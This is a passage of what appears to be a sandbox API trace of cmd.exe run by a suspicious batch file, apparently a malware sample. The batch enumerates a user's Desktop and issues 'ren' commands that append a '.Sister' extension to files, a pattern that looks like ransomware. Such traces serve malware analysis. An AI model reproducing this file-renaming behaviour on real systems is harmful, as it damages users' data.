ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x781f055f, ftLastAccessTime.dwHighDateTime=0x1d6141f, ftLastWriteTime.dwLowDateTime=0x781f055f, ftLastWriteTime.dwHighDateTime=0x1d6141f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x21e, dwReserved1=0xd8cdb0d0, cFileName="Desktop", cAlternateFileName="")) returned 0x21ed8c7cbe0 [0130.114] FindClose (in: hFindFile=0x21ed8c7cbe0 | out: hFindFile=0x21ed8c7cbe0) returned 1 [0130.114] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe", lpFindFileData=0xa6cf4fda30 | out: lpFindFileData=0xa6cf4fda30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x29182c00, ftCreationTime.dwHighDateTime=0x1d6141f, ftLastAccessTime.dwLowDateTime=0x29182c00, ftLastAccessTime.dwHighDateTime=0x1d6141f, ftLastWriteTime.dwLowDateTime=0x6a501200, ftLastWriteTime.dwHighDateTime=0x1d61406, nFileSizeHigh=0x0, nFileSizeLow=0x40800, dwReserved0=0x21e, dwReserved1=0xd8cdb0d0, cFileName="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe", cAlternateFileName="CUSERS~1.EXE")) returned 0x21ed8c7ca00 [0130.114] FindClose (in: hFindFile=0x21ed8c7ca00 | out: hFindFile=0x21ed8c7ca00) returned 1 [0130.114] _wcsnicmp (_String1="CUSERS~1.EXE", _String2="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe", _MaxCount=0x35) returned 22 [0130.114] malloc (_Size=0x1ff9c) returned 0x21ed8f10830 [0130.114] ??_V@YAXPEAX@Z () returned 0x21ed8f10830 [0130.116] GetProcessHeap () returned 0x21ed8c70000 [0130.116] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x74) returned 0x21ed8cdb760 [0130.116] ??_V@YAXPEAX@Z () returned 0x1 [0130.116] ??_V@YAXPEAX@Z () returned 0x1 [0130.117] GetProcessHeap () returned 0x21ed8c70000 [0130.117] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8cff010, Size=0x490) returned 0x21ed8cff010 [0130.117] GetProcessHeap () returned 0x21ed8c70000 [0130.117] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8cff010) returned 0x490 [0130.117] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fddc8 | out: _Buffer="\r\n") returned 2 [0130.117] _get_osfhandle (_FileHandle=1) returned 0x50 [0130.117] GetFileType (hFile=0x50) returned 0x2 [0130.118] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0130.118] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fdd58 | out: lpMode=0xa6cf4fdd58) returned 1 [0130.366] _get_osfhandle (_FileHandle=1) returned 0x50 [0130.366] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fdd98, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fdd98*=0x2) returned 1 [0130.617] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed8e50080 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0130.618] _vsnwprintf (in: _Buffer=0x21ed8e80160, _BufferCount=0x83e5, _Format="%s", _ArgList=0xa6cf4fddd8 | out: _Buffer="C:\\Users\\FD1HVy\\Desktop") returned 23 [0130.618] _vsnwprintf (in: _Buffer=0x21ed8e8018e, _BufferCount=0x83ce, _Format="%c", _ArgList=0xa6cf4fddd8 | out: _Buffer=">") returned 1 [0130.618] _get_osfhandle (_FileHandle=1) returned 0x50 [0130.618] GetFileType (hFile=0x50) returned 0x2 [0130.618] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0130.618] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fdd88 | out: lpMode=0xa6cf4fdd88) returned 1 [0130.954] _get_osfhandle (_FileHandle=1) returned 0x50 [0130.954] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8e80160*, nNumberOfCharsToWrite=0x18, lpNumberOfCharsWritten=0xa6cf4fddc8, lpReserved=0x0 | out: lpBuffer=0x21ed8e80160*, lpNumberOfCharsWritten=0xa6cf4fddc8*=0x18) returned 1 [0131.158] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.158] GetFileType (hFile=0x50) returned 0x2 [0131.158] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0131.158] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe058 | out: lpMode=0xa6cf4fe058) returned 1 [0131.275] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.275] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8cfefe0*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe098, lpReserved=0x0 | out: lpBuffer=0x21ed8cfefe0*, lpNumberOfCharsWritten=0xa6cf4fe098*=0x3) returned 1 [0131.377] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%s ", _ArgList=0xa6cf4fe098 | out: _Buffer=" \"C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister\" \"CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.bat\" ") returned 144 [0131.377] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.377] GetFileType (hFile=0x50) returned 0x2 [0131.377] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0131.377] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe028 | out: lpMode=0xa6cf4fe028) returned 1 [0131.463] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.463] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x90, lpNumberOfCharsWritten=0xa6cf4fe068, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe068*=0x90) returned 1 [0131.557] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe0c8 | out: _Buffer="\r\n") returned 2 [0131.557] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.557] GetFileType (hFile=0x50) returned 0x2 [0131.557] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0131.557] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe058 | out: lpMode=0xa6cf4fe058) returned 1 [0131.631] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.631] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe098, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe098*=0x2) returned 1 [0131.734] GetConsoleTitleW (in: lpConsoleTitle=0xa6cf4fde10, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\sysnative\\cmd.exe") returned 0x1d [0132.089] malloc (_Size=0xffce) returned 0x21ed8ea0920 [0132.089] ??_V@YAXPEAX@Z () returned 0x21ed8ea0920 [0132.090] malloc (_Size=0xffce) returned 0x21ed8ef0880 [0132.091] ??_V@YAXPEAX@Z () returned 0x21ed8ef0880 [0132.093] _wcsicmp (_String1="ren", _String2="DIR") returned 14 [0132.093] _wcsicmp (_String1="ren", _String2="ERASE") returned 13 [0132.093] _wcsicmp (_String1="ren", _String2="DEL") returned 14 [0132.093] _wcsicmp (_String1="ren", _String2="TYPE") returned -2 [0132.093] _wcsicmp (_String1="ren", _String2="COPY") returned 15 [0132.093] _wcsicmp (_String1="ren", _String2="CD") returned 15 [0132.093] _wcsicmp (_String1="ren", _String2="CHDIR") returned 15 [0132.093] _wcsicmp (_String1="ren", _String2="RENAME") returned -97 [0132.093] _wcsicmp (_String1="ren", _String2="REN") returned 0 [0132.093] ??_V@YAXPEAX@Z () returned 0x1 [0132.093] GetProcessHeap () returned 0x21ed8c70000 [0132.093] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x250) returned 0x21ed8cdb7e0 [0132.093] GetProcessHeap () returned 0x21ed8c70000 [0132.093] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8cdb7e0, Size=0x130) returned 0x21ed8cdb7e0 [0132.093] GetProcessHeap () returned 0x21ed8c70000 [0132.093] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8cdb7e0) returned 0x130 [0132.094] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0132.094] malloc (_Size=0xffce) returned 0x21ed8ef0880 [0132.094] ??_V@YAXPEAX@Z () returned 0x21ed8ef0880 [0132.094] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0132.094] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x21ed8ef0880, nVolumeNameSize=0x7fe7, lpVolumeSerialNumber=0xa6cf4fd960, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0xa6cf4fd960*=0xb4197730, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0132.098] ??_V@YAXPEAX@Z () returned 0x1 [0132.098] GetProcessHeap () returned 0x21ed8c70000 [0132.098] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x138) returned 0x21ed8cdb920 [0132.098] GetProcessHeap () returned 0x21ed8c70000 [0132.098] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x250) returned 0x21ed8cdba60 [0132.098] GetProcessHeap () returned 0x21ed8c70000 [0132.099] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8cdba60, Size=0x130) returned 0x21ed8cdba60 [0132.099] GetProcessHeap () returned 0x21ed8c70000 [0132.099] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8cdba60) returned 0x130 [0132.099] malloc (_Size=0xffce) returned 0x21ed8ef0880 [0132.099] ??_V@YAXPEAX@Z () returned 0x21ed8ef0880 [0132.099] GetProcessHeap () returned 0x21ed8c70000 [0132.099] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x58) returned 0x21ed8c7cbe0 [0132.099] GetProcessHeap () returned 0x21ed8c70000 [0132.099] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x260) returned 0x21ed8cdbba0 [0132.099] _wcsicmp (_String1="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", _String2=".") returned 53 [0132.099] _wcsicmp (_String1="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", _String2="..") returned 53 [0132.099] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister" (normalized: "c:\\users\\fd1hvy\\desktop\\cusersharlan4096desktop11-04-2020#cs fun - mwtfun.exe.sister")) returned 0xffffffff [0132.100] GetLastError () returned 0x2 [0132.100] GetProcessHeap () returned 0x21ed8c70000 [0132.100] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xffde) returned 0x21ed8cff4b0 [0132.103] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed8cff4c0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0132.103] SetErrorMode (uMode=0x0) returned 0x0 [0132.103] SetErrorMode (uMode=0x1) returned 0x0 [0132.103] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", nBufferLength=0x7fe7, lpBuffer=0x21ed8ef0880, lpFilePart=0xa6cf4fd230 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", lpFilePart=0xa6cf4fd230*="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister") returned 0x54 [0132.104] SetErrorMode (uMode=0x0) returned 0x1 [0132.104] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop" (normalized: "c:\\users\\fd1hvy\\desktop")) returned 0x11 [0132.105] GetProcessHeap () returned 0x21ed8c70000 [0132.105] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x260) returned 0x21ed8cdbe10 [0132.105] _wcsicmp (_String1="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", _String2=".") returned 53 [0132.105] _wcsicmp (_String1="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", _String2="..") returned 53 [0132.105] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister" (normalized: "c:\\users\\fd1hvy\\desktop\\cusersharlan4096desktop11-04-2020#cs fun - mwtfun.exe.sister")) returned 0xffffffff [0132.105] GetLastError () returned 0x2 [0132.105] ??_V@YAXPEAX@Z () returned 0x1 [0132.105] malloc (_Size=0xffce) returned 0x21ed8ef0880 [0132.105] ??_V@YAXPEAX@Z () returned 0x21ed8ef0880 [0132.105] malloc (_Size=0xffce) returned 0x21ed8f00860 [0132.106] ??_V@YAXPEAX@Z () returned 0x21ed8f00860 [0132.107] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister" (normalized: "c:\\users\\fd1hvy\\desktop\\cusersharlan4096desktop11-04-2020#cs fun - mwtfun.exe.sister")) returned 0xffffffff [0132.107] GetLastError () returned 0x2 [0132.107] _get_osfhandle (_FileHandle=2) returned 0x54 [0132.107] GetFileType (hFile=0x54) returned 0x2 [0132.107] GetStdHandle (nStdHandle=0xfffffff4) returned 0x54 [0132.107] GetConsoleMode (in: hConsoleHandle=0x54, lpMode=0xa6cf4fd378 | out: lpMode=0xa6cf4fd378) returned 1 [0132.207] _get_osfhandle (_FileHandle=2) returned 0x54 [0132.207] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x54, lpConsoleScreenBufferInfo=0xa6cf4fd3b0 | out: lpConsoleScreenBufferInfo=0xa6cf4fd3b0) returned 1 [0132.298] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x2, dwLanguageId=0x0, lpBuffer=0x7ff66c5d7f60, nSize=0x2000, Arguments=0x0 | out: lpBuffer="The system cannot find the file specified.\r\n") returned 0x2c [0132.298] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x2, dwLanguageId=0x0, lpBuffer=0x7ff66c5d7f60, nSize=0x2000, Arguments=0xa6cf4fd450 | out: lpBuffer="The system cannot find the file specified.\r\n") returned 0x2c [0132.298] WriteConsoleW (in: hConsoleOutput=0x54, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2c, lpNumberOfCharsWritten=0xa6cf4fd3a0, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fd3a0*=0x2c) returned 1 [0132.417] longjmp () [0132.418] ??_V@YAXPEAX@Z () returned 0x1 [0132.419] FindNextFileW (in: hFindFile=0x21ed8c7cac0, lpFindFileData=0xa6cf4fe640 | out: lpFindFileData=0xa6cf4fe640*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x45c39890, ftCreationTime.dwHighDateTime=0x1d5ec46, ftLastAccessTime.dwLowDateTime=0x4e3ff9f0, ftLastAccessTime.dwHighDateTime=0x1d5e58e, ftLastWriteTime.dwLowDateTime=0x4e3ff9f0, ftLastWriteTime.dwHighDateTime=0x1d5e58e, nFileSizeHigh=0x0, nFileSizeLow=0x9873, dwReserved0=0x0, dwReserved1=0xd8c00000, cFileName="2QVQiUvIc2zuhpxx-t.mp4", cAlternateFileName="")) returned 1 [0132.420] GetProcessHeap () returned 0x21ed8c70000 [0132.420] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8cee800, Size=0xc0) returned 0x21ed8cdc080 [0132.420] GetProcessHeap () returned 0x21ed8c70000 [0132.420] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8cdc080) returned 0xc0 [0132.420] GetProcessHeap () returned 0x21ed8c70000 [0132.420] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8d0f4a0 [0132.421] GetProcessHeap () returned 0x21ed8c70000 [0132.421] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d0f4a0, Size=0x30) returned 0x21ed8d0f4a0 [0132.421] GetProcessHeap () returned 0x21ed8c70000 [0132.424] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d0f4a0) returned 0x30 [0132.425] GetProcessHeap () returned 0x21ed8c70000 [0132.425] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8d0f4e0 [0132.425] malloc (_Size=0x1ff9c) returned 0x21ed8f10840 [0132.429] GetProcessHeap () returned 0x21ed8c70000 [0132.429] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x3e) returned 0x21ed8c7bcb0 [0132.429] ??_V@YAXPEAX@Z () returned 0x1 [0132.431] GetProcessHeap () returned 0x21ed8c70000 [0132.431] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d0f4e0, Size=0x1e0) returned 0x21ed8d0f4e0 [0132.431] GetProcessHeap () returned 0x21ed8c70000 [0132.431] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d0f4e0) returned 0x1e0 [0132.431] GetProcessHeap () returned 0x21ed8c70000 [0132.431] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8d0f6d0 [0132.431] GetProcessHeap () returned 0x21ed8c70000 [0132.431] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d0f6d0, Size=0x290) returned 0x21ed8d0f6d0 [0132.431] GetProcessHeap () returned 0x21ed8c70000 [0132.431] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d0f6d0) returned 0x290 [0132.431] GetProcessHeap () returned 0x21ed8c70000 [0132.431] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8d0f970 [0132.431] GetProcessHeap () returned 0x21ed8c70000 [0132.431] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d0f970, Size=0x30) returned 0x21ed8d0f970 [0132.431] GetProcessHeap () returned 0x21ed8c70000 [0132.431] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d0f970) returned 0x30 [0132.431] GetProcessHeap () returned 0x21ed8c70000 [0132.431] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8d0f9b0 [0132.431] malloc (_Size=0x1ff9c) returned 0x21ed8f10840 [0132.435] GetProcessHeap () returned 0x21ed8c70000 [0132.435] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x3e) returned 0x21ed8c7bf30 [0132.435] ??_V@YAXPEAX@Z () returned 0x1 [0132.437] malloc (_Size=0x1ff9c) returned 0x21ed8f10840 [0132.441] GetFullPathNameW (in: lpFileName="2QVQiUvIc2zuhpxx-t.mp4", nBufferLength=0xffce, lpBuffer=0x21ed8f10840, lpFilePart=0xa6cf4fe1c8 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\2QVQiUvIc2zuhpxx-t.mp4", lpFilePart=0xa6cf4fe1c8*="2QVQiUvIc2zuhpxx-t.mp4") returned 0x2e [0132.441] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0xa6cf4fdef0 | out: lpFindFileData=0xa6cf4fdef0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0x475bb883, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x475bb883, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4, dwReserved1=0x80, cFileName="Users", cAlternateFileName="")) returned 0x21ed8c7ca00 [0132.442] FindClose (in: hFindFile=0x21ed8c7ca00 | out: hFindFile=0x21ed8c7ca00) returned 1 [0132.442] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy", lpFindFileData=0xa6cf4fdef0 | out: lpFindFileData=0xa6cf4fdef0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x20fc850f, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x9de5855d, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x9de5855d, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4, dwReserved1=0x80, cFileName="FD1HVy", cAlternateFileName="")) returned 0x21ed8c7ce20 [0132.443] FindClose (in: hFindFile=0x21ed8c7ce20 | out: hFindFile=0x21ed8c7ce20) returned 1 [0132.443] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop", lpFindFileData=0xa6cf4fdef0 | out: lpFindFileData=0xa6cf4fdef0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x781f055f, ftLastAccessTime.dwHighDateTime=0x1d6141f, ftLastWriteTime.dwLowDateTime=0x781f055f, ftLastWriteTime.dwHighDateTime=0x1d6141f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4, dwReserved1=0x80, cFileName="Desktop", cAlternateFileName="")) returned 0x21ed8c7cc40 [0132.443] FindClose (in: hFindFile=0x21ed8c7cc40 | out: hFindFile=0x21ed8c7cc40) returned 1 [0132.443] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\2QVQiUvIc2zuhpxx-t.mp4", lpFindFileData=0xa6cf4fdef0 | out: lpFindFileData=0xa6cf4fdef0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x45c39890, ftCreationTime.dwHighDateTime=0x1d5ec46, ftLastAccessTime.dwLowDateTime=0x4e3ff9f0, ftLastAccessTime.dwHighDateTime=0x1d5e58e, ftLastWriteTime.dwLowDateTime=0x4e3ff9f0, ftLastWriteTime.dwHighDateTime=0x1d5e58e, nFileSizeHigh=0x0, nFileSizeLow=0x9873, dwReserved0=0x4, dwReserved1=0x80, cFileName="2QVQiUvIc2zuhpxx-t.mp4", cAlternateFileName="2QVQIU~1.MP4")) returned 0x21ed8c7cdc0 [0132.444] FindClose (in: hFindFile=0x21ed8c7cdc0 | out: hFindFile=0x21ed8c7cdc0) returned 1 [0132.444] _wcsnicmp (_String1="2QVQIU~1.MP4", _String2="2QVQiUvIc2zuhpxx-t.mp4", _MaxCount=0x16) returned 8 [0132.444] malloc (_Size=0x1ff9c) returned 0x21ed9080080 [0132.446] ??_V@YAXPEAX@Z () returned 0x21ed9080080 [0132.448] GetProcessHeap () returned 0x21ed8c70000 [0132.448] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x36) returned 0x21ed8cc8950 [0132.448] ??_V@YAXPEAX@Z () returned 0x1 [0132.448] ??_V@YAXPEAX@Z () returned 0x1 [0132.450] GetProcessHeap () returned 0x21ed8c70000 [0132.450] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d0f9b0, Size=0x1e0) returned 0x21ed8d0f9b0 [0132.450] GetProcessHeap () returned 0x21ed8c70000 [0132.450] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d0f9b0) returned 0x1e0 [0132.450] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe2b8 | out: _Buffer="\r\n") returned 2 [0132.450] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.450] GetFileType (hFile=0x50) returned 0x2 [0132.450] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0132.450] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe248 | out: lpMode=0xa6cf4fe248) returned 1 [0132.528] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.528] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe288, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe288*=0x2) returned 1 [0132.636] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed8e50080 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0132.636] _vsnwprintf (in: _Buffer=0x21ed8e80160, _BufferCount=0x83e5, _Format="%s", _ArgList=0xa6cf4fe2c8 | out: _Buffer="C:\\Users\\FD1HVy\\Desktop") returned 23 [0132.636] _vsnwprintf (in: _Buffer=0x21ed8e8018e, _BufferCount=0x83ce, _Format="%c", _ArgList=0xa6cf4fe2c8 | out: _Buffer=">") returned 1 [0132.636] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.636] GetFileType (hFile=0x50) returned 0x2 [0132.636] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0132.636] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe278 | out: lpMode=0xa6cf4fe278) returned 1 [0132.748] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.748] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8e80160*, nNumberOfCharsToWrite=0x18, lpNumberOfCharsWritten=0xa6cf4fe2b8, lpReserved=0x0 | out: lpBuffer=0x21ed8e80160*, lpNumberOfCharsWritten=0xa6cf4fe2b8*=0x18) returned 1 [0133.011] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.011] GetFileType (hFile=0x50) returned 0x2 [0133.011] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0133.011] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4e8 | out: lpMode=0xa6cf4fe4e8) returned 1 [0133.246] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.246] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8d0f4b0*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe528, lpReserved=0x0 | out: lpBuffer=0x21ed8d0f4b0*, lpNumberOfCharsWritten=0xa6cf4fe528*=0x3) returned 1 [0133.356] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%s ", _ArgList=0xa6cf4fe528 | out: _Buffer=" \"2QVQiUvIc2zuhpxx-t.mp4\" \"2QVQiUvIc2zuhpxx-t.mp4.Sister\" ") returned 58 [0133.356] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.356] GetFileType (hFile=0x50) returned 0x2 [0133.356] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0133.356] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0133.563] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.563] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x3a, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x3a) returned 1 [0133.723] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format=" %s ", _ArgList=0xa6cf4fe558 | out: _Buffer=" & ") returned 3 [0133.723] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.723] GetFileType (hFile=0x50) returned 0x2 [0133.723] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0133.723] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4e8 | out: lpMode=0xa6cf4fe4e8) returned 1 [0133.976] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.976] WriteConsoleW (in: hConsoleOutput=0x50, 